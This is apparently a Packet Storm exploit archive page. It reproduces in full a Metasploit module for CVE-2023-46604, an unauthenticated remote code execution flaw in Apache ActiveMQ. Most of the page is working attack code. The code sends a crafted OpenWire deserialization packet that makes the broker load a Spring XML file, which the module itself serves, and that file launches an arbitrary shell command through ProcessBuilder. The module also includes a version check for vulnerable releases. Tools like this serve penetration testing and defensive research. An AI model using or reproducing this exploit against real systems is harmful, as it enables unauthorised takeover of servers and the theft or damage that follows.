exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache ActiveMQ Unauthenticated Remote Code Execution

Apache ActiveMQ Unauthenticated Remote Code Execution
Posted Nov 14, 2023
Authored by sfewer-r7, X1r0z | Site metasploit.com

This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

tags | exploit
advisories | CVE-2023-46604
SHA-256 | d62b07b49999cf639cee2c97c21a92b797b2c59f3353f6f4b3a0a040950ac02e

Apache ActiveMQ Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Retry

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
5.16.6, and all versions before 5.15.16.
},
'License' => MSF_LICENSE,
'Author' => [
'X1r0z', # Original technical analysis & exploit
'sfewer-r7', # MSF exploit & Rapid7 analysis
],
'References' => [
['CVE', '2023-46604'],
['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
],
'DisclosureDate' => '2023-10-27',
'Privileged' => false,
'Platform' => %w[win linux unix],
'Arch' => [ARCH_CMD],
# The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
# Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
# be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
'Stance' => Stance::Aggressive,
'Targets' => [
[
'Windows',
{
'Platform' => 'win'
}
],
[
'Linux',
{
'Platform' => 'linux'
}
],
[
'Unix',
{
'Platform' => 'unix'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
# By default ActiveMQ listens for OpenWire requests on TCP port 61616.
'RPORT' => 61616,
# The maximum time in seconds to wait for a session.
'WfsDelay' => 30
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def check
connect

res = sock.get_once

disconnect

return CheckCode::Unknown unless res

len, _, magic = res.unpack('NCZ*')

return CheckCode::Unknown unless res.length == len + 4

return CheckCode::Unknown unless magic == 'ActiveMQ'

return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/

version = Rex::Version.new(::Regexp.last_match(1))

ranges = [
['5.18.0', '5.18.2'],
['5.17.0', '5.17.5'],
['5.16.0', '5.16.6'],
['0.0.0', '5.15.15']
]

ranges.each do |min, max|
if version.between?(Rex::Version.new(min), Rex::Version.new(max))
return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
end
end

Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
end

def exploit
# The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.
if payload.encoded.include? ']]>'
fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')
end

start_service

connect

# The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
# leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
# serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
# run an attacker supplied command line via java.lang.ProcessBuilder.start.
clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'

# 31 is the EXCEPTION_RESPONSE data type.
data = [31].pack('C')
# ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
data << [0].pack('N')
# and a 1 byte boolean for response required.
data << [0].pack('C')
# ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
data << [0].pack('N')
# BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
data << [1].pack('C')
# BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
data << [1].pack('C')
# First 2 bytes are the length.
data << [clazz.length].pack('n')
# Then the string data. This is the class name to instantiate.
data << clazz
# Same again for the method string. This is the single string parameter used during class instantiation.
data << [1].pack('C')
data << [get_uri.length].pack('n')
data << get_uri

sock.puts([data.length].pack('N') + data)

retry_until_truthy(timeout: datastore['WfsDelay']) do
!handler_enabled? || session_created?
end

handler
ensure
cleanup
end

def on_request_uri(cli, request)
if request.uri != get_resource
super
end

case target['Platform']
when 'win'
shell = 'cmd.exe'
flag = '/c'
when 'linux', 'unix'
shell = '/bin/sh'
flag = '-c'
end

xml = %(<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>#{shell}</value>
<value>#{flag}</value>
<value><![CDATA[#{payload.encoded}]]></value>
</list>
</constructor-arg>
</bean>
</beans>)

send_response(cli, xml, {
'Content-Type' => 'application/xml',
'Connection' => 'close',
'Pragma' => 'no-cache'
})

print_status('Sent ClassPathXmlApplicationContext configuration file.')
end

end
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close